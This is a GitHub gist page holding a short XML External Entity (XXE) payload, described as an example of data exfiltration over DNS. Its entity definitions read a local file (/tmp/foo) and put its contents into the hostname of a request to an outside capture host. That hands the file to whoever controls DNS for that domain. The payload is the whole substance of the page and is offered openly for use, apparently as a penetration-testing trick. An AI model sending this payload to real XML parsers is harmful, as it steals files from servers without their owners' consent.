marcwickenden/oob-dns.xml

Created May 16, 2018 17:27

Star 3 You must be signed in to star a gist
Fork 0 You must be signed in to fork a gist

Learn more about clone URLs
Clone this repository at <script src="https://gist.github.com/marcwickenden/acd0b23953b52e7c1a1a90925862d8e2.js"></script>
Save marcwickenden/acd0b23953b52e7c1a1a90925862d8e2 to your computer and use it in GitHub Desktop.

Download ZIP

Example of data exfil using DNS in XXE. This will only work if the target file (/tmp/foo in this case) does not contain new lines. Good luck with that!

Raw

oob-dns.xml

	<!ENTITY % data SYSTEM "file:///tmp/foo">
	<!ENTITY % url "<!ENTITY % exfil SYSTEM 'http://%data;.127.0.0.1.xip.io/capture'>">

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment